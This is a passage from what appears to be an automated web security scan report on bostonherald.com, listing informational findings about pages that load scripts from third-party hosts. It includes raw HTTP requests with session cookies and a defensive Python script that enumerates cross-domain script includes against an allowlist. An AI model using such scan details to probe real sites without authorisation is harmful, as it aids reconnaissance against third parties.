<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.728. http://www.bostonherald.com/sports/football/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/football/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sports/football/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:53:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 65339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div style="margin-bottom: 10px; margin-left: 8px;">
<script type="text/javascript" src="http://cdn.cinesport.com/container.js"></script>
...[SNIP]...
<div>
<script LANGUAGE="JavaScript" SRC="http://www.sportsnetwork.com/aspdata/clients/herald/nflschedule.aspx?id=077"></script>
...[SNIP]...
<div style="padding:5px; border-top:solid 1px #ddd;border-left:solid 1px #ddd;border-right:solid 1px #ddd;">
<script LANGUAGE="JavaScript" SRC="http://www.sportsnetwork.com/aspdata/clients/herald/nflministandings.aspx?id=077"></script>
...[SNIP]...
<div style="padding:5px; border-top:solid 1px #ddd;border-left:solid 1px #ddd;border-right:solid 1px #ddd;">
<script LANGUAGE="JavaScript" SRC="http://www.sportsnetwork.com/aspdata/clients/herald/nflteamleaders.aspx?id=077"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.729. http://www.bostonherald.com/sports/football/patriot_moments/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/football/patriot_moments/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sports/football/patriot_moments/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:54:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 27253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.730. http://www.bostonherald.com/sports/football/patriots/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/football/patriots/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sports/football/patriots/view.bg?articleid=1312522&srvc=home&position=active HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:53:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 48285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...
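The findings in this section all come from one rule: any script tag whose src resolves to a host other than the page's own is reported, because that script executes with the full privileges of the including page, so compromise of the third-party host (or, for plain-http includes like these, a network attacker) is equivalent to a stored XSS on the site. Sibling hosts of the same publisher, such as cache.heraldinteractive.com here, are still separate hosts and are flagged the same way, which is why triage usually needs an allowlist of hosts the site owner actually controls. The following Python script is an added example of that check and is not the crawler's own code; the sample HTML is constructed from the script tags in the response above, with a relative "/js/local.js" and a protocol-relative addthis URL added (both assumptions) to exercise URL resolution, and the allowlist used in the demo is likewise an assumption.

```python
"""Enumerate cross-domain <script src> includes in an HTML response.

Added example for this report section; it is not the crawler's own code.
SAMPLE_HTML is constructed from script tags visible in the bostonherald.com
response above; the "/js/local.js" and protocol-relative addthis entries
are made up to exercise relative URL resolution.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Page whose response is being examined (finding 18.730).
PAGE_URL = "http://www.bostonherald.com/sports/football/patriots/view.bg"

# Constructed sample input (see module docstring).
SAMPLE_HTML = """<html><head>
<!-- // article.t <script src="http://commented.example/x.js"></script> -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
<script src="/js/local.js" type="text/javascript"></script>
<script src="//s7.addthis.com/js/200/addthis_widget.js"></script>
<script LANGUAGE="JavaScript" SRC="http://www.sportsnetwork.com/aspdata/clients/herald/golfleaderboard.aspx?sportcode=BE,id="></script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<script type="text/javascript">var inline = 1;</script>
</head><body></body></html>"""


class _ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> start tag.

    HTMLParser lower-cases tag and attribute names, so SRC= / LANGUAGE=
    variants are handled, and start tags inside <!-- --> comments are
    never reported, matching what a browser would actually load.
    """

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        for name, value in attrs:
            if name == "src" and value and value.strip():
                self.srcs.append(value.strip())


def cross_domain_scripts(page_url, html):
    """Map each foreign host to the absolute script URLs loaded from it.

    A host is foreign when it differs from the page's own host. That is
    the rule behind the 'cross-domain script include' finding: sibling
    hosts of the same publisher are separate hosts and are reported too.
    """
    page_host = (urlsplit(page_url).hostname or "").lower()
    collector = _ScriptSrcCollector()
    collector.feed(html)
    collector.close()
    found = {}
    for src in collector.srcs:
        absolute = urljoin(page_url, src)  # resolves "/path" and "//host/path"
        host = (urlsplit(absolute).hostname or "").lower()
        if not host or host == page_host:
            continue  # same-host include: not cross-domain
        found.setdefault(host, []).append(absolute)
    return found


def unexpected_hosts(found, trusted):
    """Foreign hosts not in the reviewer-supplied allowlist (triage step)."""
    trusted = {h.lower() for h in trusted}
    return sorted(h for h in found if h not in trusted)


if __name__ == "__main__":
    includes = cross_domain_scripts(PAGE_URL, SAMPLE_HTML)
    for host, urls in sorted(includes.items()):
        for url in urls:
            print(f"{host:32} {url}")
    # Assumed allowlist for the demo: the publisher's own CDN host only.
    print("unexpected:", unexpected_hosts(includes, {"cache.heraldinteractive.com"}))
```

Run against a saved response body, the script reproduces the list the crawler reports for each URL; the allowlist step separates hosts the site operator controls from true third parties, which is where remediation effort (self-hosting the library, or pinning it with Subresource Integrity and a Content-Security-Policy script-src that names only the expected hosts) should go first.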

18.731. http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7

Issue detail

The response dynamically includes scripts from the following other domains (those visible in the response excerpt below):

ajax.googleapis.com
cache.heraldinteractive.com
s7.addthis.com
d.yimg.com
pagead2.googlesyndication.com
edge.quantserve.com

Request

GET /sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:53:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 96220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.732. http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/srvc=home&position=7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/srvc=home&position=7

Issue detail

The response dynamically includes scripts from the following other domains (those visible in the response excerpt below):

ajax.googleapis.com
cache.heraldinteractive.com
s7.addthis.com
d.yimg.com
pagead2.googlesyndication.com
edge.quantserve.com

Request

GET /sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/srvc=home&position=7 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:51:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 48286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.733. http://www.bostonherald.com/sports/golf/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/golf/

Issue detail

The response dynamically includes scripts from the following other domains (those visible in the response excerpt below):

ajax.googleapis.com
cache.heraldinteractive.com
www.sportsnetwork.com
edge.quantserve.com

Request

GET /sports/golf/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:07:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 74397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div style="padding:5px; border-top:solid 1px #ddd;border-left:solid 1px #ddd;border-right:solid 1px #ddd;">
<script LANGUAGE="JavaScript" SRC="http://www.sportsnetwork.com/aspdata/clients/herald/golfleaderboard.aspx?sportcode=BE,id="></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.734. http://www.bostonherald.com/sports/hockey/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/hockey/

Issue detail

The response dynamically includes scripts from the following other domains (those visible in the response excerpt below):

ajax.googleapis.com
cache.heraldinteractive.com
scores.heraldinteractive.com
cdn.cinesport.com
edge.quantserve.com

Request

GET /sports/hockey/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:00:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 66910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div>
<script LANGUAGE="JavaScript" SRC="http://scores.heraldinteractive.com/aspdata/clients/herald/nhlschedule.aspx?id=121"></script>
...[SNIP]...
<div style="padding:5px; border-top:solid 1px #ddd;border-left:solid 1px #ddd;border-right:solid 1px #ddd;">
<script LANGUAGE="JavaScript" SRC="http://scores.heraldinteractive.com/aspdata/clients/herald/nhlministandings.aspx?id=121"></script>
...[SNIP]...
<div style="padding:5px; border-top:solid 1px #ddd;border-left:solid 1px #ddd;border-right:solid 1px #ddd;">
<script LANGUAGE="JavaScript" SRC="http://scores.heraldinteractive.com/aspdata/clients/herald/nhlteamleaders.aspx?id=121"></script>
...[SNIP]...
<div style="margin-bottom: 10px; margin-left: 8px;">
<script type="text/javascript" src="http://cdn.cinesport.com/container.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.735. http://www.bostonherald.com/sports/hockey/bruins/view/20110128bs_need_a_lot_of_work_onus_on_the_players/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/hockey/bruins/view/20110128bs_need_a_lot_of_work_onus_on_the_players/srvc=home&position=also

Issue detail

The response dynamically includes scripts from the following other domains (those visible in the response excerpt below):

ajax.googleapis.com
cache.heraldinteractive.com
s7.addthis.com
d.yimg.com
pagead2.googlesyndication.com
cdn.cinesport.com
edge.quantserve.com

Request

GET /sports/hockey/bruins/view/20110128bs_need_a_lot_of_work_onus_on_the_players/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
